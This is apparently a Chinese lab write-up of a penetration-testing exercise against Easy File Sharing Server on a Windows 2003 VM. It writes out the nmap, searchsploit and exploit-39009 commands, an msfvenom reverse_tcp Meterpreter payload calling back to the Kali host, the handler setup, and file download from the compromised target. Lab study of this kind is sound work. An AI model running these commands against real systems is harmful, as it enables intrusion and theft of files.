网络渗透测试复现任务easy file sharing server

本文介绍了如何通过easyfilesharingserver漏洞进行靶机渗透,涉及Nmap扫描、Metasploit工具链及Meterpreter利用过程。
摘要由CSDN通过智能技术生成

一、漏洞渗透测试

(一)靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

1.在Win2003中安装easy file sharing server(efssetup_2018.zip)

2.将efssetup_2018.zip直接拖进Win2003解压并安装,一直next即可,安装路径可以自己选择,安装成功后直接Try it!由于80端口被占用,所以这里将端口改为8000

(二)利用Nmap发现靶(Windows)运行了该服务

1.kali和Windows均设为桥接模式并连接手机热点

2.kali在root模式下对整个子网进行扫描

3.找到Windows靶机存活且ip为192.168.154.209

4.使用nmap -sV 192.168.154.209扫描靶机端口开放情况,发现靶机开放了easy file sharing server服务

5.使用命令searchsploit easy file sharing检测easy file sharing server存在的漏洞

6.对于39009.py程序,使用命令searchsploit -m 39009查询地址

7.执行python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.154.209 8000命令,Windows靶机即会弹出计算器,easy file sharing server被终止

二、Metasploit应用

1.在kali用ifconfig命令得到kali的ip

kali:192.168.154.135

2.使用命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.154.135 lport=5000 -f exe -o /root/payload.exe在桌面生成一个payload.exe文件

3.使用命令msfconsole打开Metasploit

4.在Metasploit中依次使用指令

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.154.135

set lport 5000

exploit

5使用命令chmod 777 /root打开root文件的查看权限,将payload.exe文件移至Windows靶机中并双击运行,并在kali中查看变化,出现以下的提示则证明已经获得了对靶机的操控权限

6.使用ls命令查看文件

7.使用命令download 文件名下载所需要的文件即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值